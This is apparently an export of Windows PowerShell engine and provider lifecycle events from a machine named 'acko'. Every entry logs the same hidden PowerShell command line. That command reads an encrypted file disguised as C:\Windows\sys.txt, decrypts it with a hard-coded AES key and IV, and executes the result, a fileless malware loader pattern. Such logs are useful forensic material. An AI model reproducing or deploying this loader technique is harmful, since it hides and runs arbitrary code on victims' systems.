Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:25
Event ID: 403
Task Category: Engine Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Engine state is changed from Available to Stopped.

Details:
NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=15

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=5.1.26100.3613
RunspaceId=a71139b1-9e14-444a-83d8-d36b2d273ffc
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:
<Event>
  <System>
    <!-- attribute-only elements (Provider, TimeCreated, Correlation, Execution, Security) were not preserved in this copy -->
    <EventID>403</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>4</Task>
    <Opcode>0</Opcode>
    <Keywords>0x80000000000000</Keywords>
    <EventRecordID>8004</EventRecordID>
    <Channel>Windows PowerShell</Channel>
    <Computer>acko</Computer>
  </System>
  <EventData>
    <Data>Stopped</Data>
    <Data>Available</Data>
    <Data>NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=15

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=5.1.26100.3613
RunspaceId=a71139b1-9e14-444a-83d8-d36b2d273ffc
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
  </EventData>
</Event>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:25
Event ID: 400
Task Category: Engine Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Engine state is changed from None to Available.

Details:
NewEngineState=Available
PreviousEngineState=None

SequenceNumber=13

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=5.1.26100.3613
RunspaceId=a71139b1-9e14-444a-83d8-d36b2d273ffc
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:
<Event>
  <System>
    <!-- attribute-only elements (Provider, TimeCreated, Correlation, Execution, Security) were not preserved in this copy -->
    <EventID>400</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>4</Task>
    <Opcode>0</Opcode>
    <Keywords>0x80000000000000</Keywords>
    <EventRecordID>8003</EventRecordID>
    <Channel>Windows PowerShell</Channel>
    <Computer>acko</Computer>
  </System>
  <EventData>
    <Data>Available</Data>
    <Data>None</Data>
    <Data>NewEngineState=Available
PreviousEngineState=None

SequenceNumber=13

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=5.1.26100.3613
RunspaceId=a71139b1-9e14-444a-83d8-d36b2d273ffc
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
  </EventData>
</Event>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "Variable" is Started.

Details:
ProviderName=Variable
NewProviderState=Started

SequenceNumber=11

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:
<Event>
  <System>
    <!-- attribute-only elements (Provider, TimeCreated, Correlation, Execution, Security) were not preserved in this copy -->
    <EventID>600</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>6</Task>
    <Opcode>0</Opcode>
    <Keywords>0x80000000000000</Keywords>
    <EventRecordID>8002</EventRecordID>
    <Channel>Windows PowerShell</Channel>
    <Computer>acko</Computer>
  </System>
  <EventData>
    <Data>Variable</Data>
    <Data>Started</Data>
    <Data>ProviderName=Variable
NewProviderState=Started

SequenceNumber=11

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
  </EventData>
</Event>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "Function" is Started.

Details:
ProviderName=Function
NewProviderState=Started

SequenceNumber=9

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:
<Event>
  <System>
    <!-- attribute-only elements (Provider, TimeCreated, Correlation, Execution, Security) were not preserved in this copy -->
    <EventID>600</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>6</Task>
    <Opcode>0</Opcode>
    <Keywords>0x80000000000000</Keywords>
    <EventRecordID>8001</EventRecordID>
    <Channel>Windows PowerShell</Channel>
    <Computer>acko</Computer>
  </System>
  <EventData>
    <Data>Function</Data>
    <Data>Started</Data>
    <Data>ProviderName=Function
NewProviderState=Started

SequenceNumber=9

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
  </EventData>
</Event>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "FileSystem" is Started.

Details:
ProviderName=FileSystem
NewProviderState=Started

SequenceNumber=7

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:
<Event>
  <System>
    <!-- attribute-only elements (Provider, TimeCreated, Correlation, Execution, Security) were not preserved in this copy -->
    <EventID>600</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>6</Task>
    <Opcode>0</Opcode>
    <Keywords>0x80000000000000</Keywords>
    <EventRecordID>8000</EventRecordID>
    <Channel>Windows PowerShell</Channel>
    <Computer>acko</Computer>
  </System>
  <EventData>
    <Data>FileSystem</Data>
    <Data>Started</Data>
    <Data>ProviderName=FileSystem
NewProviderState=Started

SequenceNumber=7

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
  </EventData>
</Event>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "Environment" is Started.

Details:
ProviderName=Environment
NewProviderState=Started

SequenceNumber=5

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:
<Event>
  <System>
    <!-- attribute-only elements (Provider, TimeCreated, Correlation, Execution, Security) were not preserved in this copy -->
    <EventID>600</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>6</Task>
    <Opcode>0</Opcode>
    <Keywords>0x80000000000000</Keywords>
    <EventRecordID>7999</EventRecordID>
    <Channel>Windows PowerShell</Channel>
    <Computer>acko</Computer>
  </System>
  <EventData>
    <Data>Environment</Data>
    <Data>Started</Data>
    <Data>ProviderName=Environment
NewProviderState=Started

SequenceNumber=5

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
  </EventData>
</Event>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "Alias" is Started.

Details:
ProviderName=Alias
NewProviderState=Started

SequenceNumber=3

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:
<Event>
  <System>
    <!-- attribute-only elements (Provider, TimeCreated, Correlation, Execution, Security) were not preserved in this copy -->
    <EventID>600</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>6</Task>
    <Opcode>0</Opcode>
    <Keywords>0x80000000000000</Keywords>
    <EventRecordID>7998</EventRecordID>
    <Channel>Windows PowerShell</Channel>
    <Computer>acko</Computer>
  </System>
  <EventData>
    <Data>Alias</Data>
    <Data>Started</Data>
    <Data>ProviderName=Alias
NewProviderState=Started

SequenceNumber=3

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
  </EventData>
</Event>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "Registry" is Started.

Details:
ProviderName=Registry
NewProviderState=Started

SequenceNumber=1

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:
<Event>
  <System>
    <!-- attribute-only elements (Provider, TimeCreated, Correlation, Execution, Security) were not preserved in this copy -->
    <EventID>600</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>6</Task>
    <Opcode>0</Opcode>
    <Keywords>0x80000000000000</Keywords>
    <EventRecordID>7997</EventRecordID>
    <Channel>Windows PowerShell</Channel>
    <Computer>acko</Computer>
  </System>
  <EventData>
    <Data>Registry</Data>
    <Data>Started</Data>
    <Data>ProviderName=Registry
NewProviderState=Started

SequenceNumber=1

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
  </EventData>
</Event>